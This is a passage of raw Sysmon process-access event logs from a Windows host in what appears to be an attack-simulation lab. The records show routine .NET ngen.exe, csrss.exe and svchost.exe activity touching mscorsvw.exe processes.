c.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:23.007","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2243-5F25-0000-00101F370C00}","TargetProcessId":"3664","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7153,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:23.007\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2243-5F25-0000-00101F370C00}\r\nTargetProcessId: 3664\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:23.007","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2243-5F25-0000-00101F370C00}","TargetProcessId":"3664","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7154,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:23.007\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2243-5F25-0000-00101F370C00}\r\nTargetProcessId: 3664\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:23.007","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2243-5F25-0000-00101F370C00}","TargetProcessId":"3664","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7155,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:23.038\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2243-5F25-0000-0010CF3A0C00}\r\nTargetProcessId: 2256\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:23.038","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2243-5F25-0000-0010CF3A0C00}","TargetProcessId":"2256","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7156,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:23.054\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2243-5F25-0000-0010CF3A0C00}\r\nTargetProcessId: 2256\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:23.054","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2243-5F25-0000-0010CF3A0C00}","TargetProcessId":"2256","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7157,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:23.054\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2243-5F25-0000-0010CF3A0C00}\r\nTargetProcessId: 2256\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:23.054","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2243-5F25-0000-0010CF3A0C00}","TargetProcessId":"2256","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7158,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:23.101\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2243-5F25-0000-0010F03E0C00}\r\nTargetProcessId: 4500\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:23.101","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2243-5F25-0000-0010F03E0C00}","TargetProcessId":"4500","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7159,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:23.101\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2243-5F25-0000-0010F03E0C00}\r\nTargetProcessId: 4500\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:23.101","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2243-5F25-0000-0010F03E0C00}","TargetProcessId":"4500","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7160,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:23.101\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2243-5F25-0000-0010F03E0C00}\r\nTargetProcessId: 4500\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 